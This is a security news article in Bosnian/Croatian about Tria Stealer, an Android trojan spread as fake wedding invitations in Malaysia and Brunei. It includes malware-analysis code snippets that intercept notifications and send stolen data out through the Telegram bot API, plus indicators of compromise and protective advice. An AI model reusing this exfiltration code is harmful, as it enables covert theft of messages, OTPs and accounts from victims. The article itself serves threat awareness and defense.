Novootkrivena kampanja malicioznog softvera za Android, nazvana Tria Stealer, cilja na korisnike u Maleziji i Bruneju od sredine 2024. godine.
Koristeći lažne pozivnice za vjenčanje kao mamac, ovaj trojanac krade osjetljive podatke, uključujući SMS poruke, evidencije poziva i obavještenja aplikacija, i eksfiltrira ih napadačima putem Telegram botova.
Kampanja je izazvala značajnu zabrinutost za sajber sigurnost zbog svojih sofisticiranih tehnika i taktika socijalnog inženjeringa.
Analitičari kibernetičke sigurnosti u Kaspersky Labs-u otkrili su da se maliciozni softver distribuiše kao APK datoteka putem ličnih i grupnih razgovora na WhatsApp-u i Telegramu.
%20and%20through%20a%20compromised%20Telegram%20account%20(on%20the%20right)%20(Source%20-%20Securelist).webp)
Kako Tria Stealer radi
Žrtve su prevarene da preuzmu aplikaciju pod krinkom gledanja digitalne pozivnice za vjenčanje.
Nakon instalacije, maliciozni softver traži dozvole kao što su android.permission.RECEIVE_SMS, android.permission.READ_CALL_LOG, i android.permission.BIND_NOTIFICATION_LISTENER_SERVICE, dajući mu pristup SMS porukama, evidencijama poziva i obavještenjima aplikacija.
Jednom instalirana, aplikacija se maskira kao aplikacija za sistemska podešavanja koristeći ikonu zupčanika kako bi izgledala legitimno.
Tokom svog prvog izvršenja, prikuplja informacije o uređaju (kao što su marka i model) i broj telefona žrtve.
.webp)
Ovi podaci se sklapaju u niz i šalju na server za upravljanje i upravljanje (C2) putem Telegram API poziva.
HttpURLConnection httpURLConnection = (HttpURLConnection) new URL(
"https://api.telegram.org/bot<bot_token>/sendMessage").openConnection();
httpURLConnection.setRequestMethod("POST");
httpURLConnection.setDoOutput(true);
byte[] bytes = ("chat_id=<chat_id>&text=" + collectedData).getBytes(StandardCharsets.UTF_8);
DataOutputStream dataOutputStream = new DataOutputStream(httpURLConnection.getOutputStream());
dataOutputStream.write(bytes);
dataOutputStream.close();Ključne karakteristike Tria stealer-a uključuju:-
1. SMS i praćenje poziva :
- Trojanac koristi
BroadcastReceiverkomponente (SMSMonitoriCallMonitor) za presretanje dolaznih SMS poruka i detalja o pozivima. - Prikupljeni podaci uključuju sadržaj poruke, informacije o pošiljaocu i detalje o SIM utoru za dual-SIM uređaje.
2. Presretanje obavještenja :
- Maliciozni softver presreće obavještenja iz aplikacija poput WhatsAppa, Gmaila, Outlooka i drugih koristeći ovu
onNotificationPostedfunkciju. - Izvučene informacije se kombinuju sa detaljima uređaja i šalju Telegram botovima.
@Override
public final void onNotificationPosted(StatusBarNotification statusBarNotification) {
String packageName = statusBarNotification.getPackageName();
String notificationContent = statusBarNotification.getNotification().extras.getString("android.text");
sendToTelegram("App: " + packageName + "\nContent: " + notificationContent);
}3. Otmica računa :
- Presretanjem jednokratnih lozinki (OTP) iz SMS poruka, maliciozni softver omogućava napadačima da otmu račune na platformama kao što su WhatsApp i Telegram.
- Narušeni nalozi se koriste za dalju distribuciju malicioznog APK-a ili lažno predstavljanje žrtava za finansijske prevare.
4. Krađa podataka specifična za aplikaciju :
- Tria Stealer cilja na aplikacije kao što su
com.whatsapp(WhatsApp),com.google.android.gm(Gmail) i druge tako što izdvaja osjetljive podatke iz obavijesti.
Indikatori kompromisa
- APK nazivi: Jemputan Perkahwinan.apk , KAD JEMPUTAN PERKAHWINAN.apk
- Haševi fajlova:
de9384577e28c52f8dc690b141098969 - Telegram botovi:
bot7245598298:AAHcn9EndJ-peGQD6a4wBNXhx9HaYmXDGoA
Da biste se zaštitili od Tria Stealer-a, izbjegavajte instaliranje APK-ova iz nepouzdanih izvora i koristite pouzdana mobilna sigurnosna rješenja koja mogu otkriti prijetnje poput HEUR:Trojan-Spy.AndroidOS.Agent.*.
Osim toga, redovno ažuriranje softvera uređaja pomaže u zakrpanju ranjivosti i poboljšava sigurnost .
Iskorištavanjem taktike društvenog inženjeringa i korištenjem Telegrama za C2 komunikaciju, on predstavlja značajnu prijetnju privatnosti i sigurnosti korisnika.
Korisnici u Maleziji i Bruneju ostaju primarne mete, ali globalna Android zajednica mora ostati na oprezu protiv takvih napada.
Izvor: CyberSecurityNews